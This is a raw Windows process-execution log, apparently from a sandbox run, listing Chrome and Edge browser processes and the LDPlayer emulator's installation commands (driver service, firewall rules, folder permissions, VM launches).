"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=9332 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=8680 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9832 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=9812 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=9724 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=10268 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=4696 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=10456 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=10608 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=8140 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=8160 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=8364 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=10744 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=6160 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=10892 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=11172 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=11156 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=11408 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=11576 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=8468 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=11340 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=8400 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=7660 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=11732 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8472 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=8248 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=11500 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5112 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=5104 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7440 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4080 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

F:\LDPlayer\LDPlayer9\LDPlayer.exe

"F:\LDPlayer\LDPlayer9\\LDPlayer.exe" -silence -downloader -openid=1252 -language=en -path="F:\LDPlayer\LDPlayer9\"

F:\LDPlayer\LDPlayer9\dnrepairer.exe

"F:\LDPlayer\LDPlayer9\dnrepairer.exe" listener=394540

C:\Windows\SysWOW64\net.exe

"net" start cryptsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start cryptsvc

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" Softpub.dll /s

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" Wintrust.dll /s

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" Initpki.dll /s

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32" Initpki.dll /s

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" dssenh.dll /s

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" rsaenh.dll /s

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" cryptdlg.dll /s

C:\Windows\SysWOW64\takeown.exe

"takeown" /f "F:\LDPlayer\LDPlayer9\vms" /r /d y

C:\Windows\SysWOW64\icacls.exe

"icacls" "F:\LDPlayer\LDPlayer9\vms" /grant everyone:F /t

C:\Windows\SysWOW64\takeown.exe

"takeown" /f "F:\LDPlayer\LDPlayer9\\system.vmdk"

C:\Windows\SysWOW64\icacls.exe

"icacls" "F:\LDPlayer\LDPlayer9\\system.vmdk" /grant everyone:F /t

C:\Windows\SysWOW64\dism.exe

C:\Windows\system32\dism.exe /Online /English /Get-Features

C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe

C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe {4A3E894B-16A0-4C6E-B9BC-26B5A48C983B}

C:\Windows\SysWOW64\sc.exe

sc query HvHost

C:\Windows\SysWOW64\sc.exe

sc query vmms

C:\Windows\SysWOW64\sc.exe

sc query vmcompute

C:\Program Files\ldplayer9box\Ld9BoxSVC.exe

"C:\Program Files\ldplayer9box\Ld9BoxSVC.exe" /RegServer

C:\Windows\SYSTEM32\regsvr32.exe

"regsvr32" "C:\Program Files\ldplayer9box\VBoxC.dll" /s

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" "C:\Program Files\ldplayer9box\x86\VBoxClient-x86.dll" /s

C:\Windows\SYSTEM32\regsvr32.exe

"regsvr32" "C:\Program Files\ldplayer9box\VBoxProxyStub.dll" /s

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" "C:\Program Files\ldplayer9box\x86\VBoxProxyStub-x86.dll" /s

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc" create Ld9BoxSup binPath= "C:\Program Files\ldplayer9box\Ld9BoxSup.sys" type= kernel start= auto

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc" start Ld9BoxSup

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" New-NetFirewallRule -DisplayName "Ld9BoxSup" -Direction Inbound -Program 'C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe' -RemoteAddress LocalSubnet -Action Allow

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" New-NetFirewallRule -DisplayName "Ld9BoxNat" -Direction Inbound -Program 'C:\Program Files\ldplayer9box\VBoxNetNAT.exe' -RemoteAddress LocalSubnet -Action Allow

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" New-NetFirewallRule -DisplayName "dnplayer" -Direction Inbound -Program 'F:\LDPlayer\LDPlayer9\dnplayer.exe' -RemoteAddress LocalSubnet -Action Allow

F:\LDPlayer\LDPlayer9\driverconfig.exe

"F:\LDPlayer\LDPlayer9\driverconfig.exe"

C:\Windows\SysWOW64\takeown.exe

"takeown" /f F:\LDPlayer\ldmutiplayer\ /r /d y

C:\Windows\SysWOW64\icacls.exe

"icacls" F:\LDPlayer\ldmutiplayer\ /grant everyone:F /t

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/4bUcwDd53d

F:\LDPlayer\LDPlayer9\dnplayer.exe

"F:\LDPlayer\LDPlayer9\\dnplayer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff89be246f8,0x7ff89be24708,0x7ff89be24718

C:\Program Files\ldplayer9box\Ld9BoxSVC.exe

"C:\Program Files\ldplayer9box\Ld9BoxSVC.exe" -Embedding

C:\Windows\SysWOW64\sc.exe

sc query HvHost

C:\Windows\SysWOW64\sc.exe

sc query vmms

C:\Windows\SysWOW64\sc.exe

sc query vmcompute

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\ldplayer9box\vbox-img.exe

"C:\Program Files\ldplayer9box\vbox-img.exe" setuuid --filename "F:\LDPlayer\LDPlayer9\vms\..\system.vmdk" --uuid 20160302-bbbb-bbbb-54d7-bbbb00000000

C:\Program Files\ldplayer9box\vbox-img.exe

"C:\Program Files\ldplayer9box\vbox-img.exe" setuuid --filename "F:\LDPlayer\LDPlayer9\vms\leidian0\data.vmdk" --uuid 20160302-cccc-cccc-54d7-000000000000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1

C:\Program Files\ldplayer9box\vbox-img.exe

"C:\Program Files\ldplayer9box\vbox-img.exe" setuuid --filename "F:\LDPlayer\LDPlayer9\vms\leidian0\sdcard.vmdk" --uuid 20160302-dddd-dddd-54d7-000000000000

C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe

"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1

C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe

"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config

C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe

"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config

C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe

"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config

C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe

"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3932 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Windows\SysWOW64\sc.exe

sc query HvHost

C:\Windows\SysWOW64\sc.exe

sc query vmms

C:\Windows\SysWOW64\sc.exe

sc query vmcompute

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4336 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10384 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8004 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5596 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

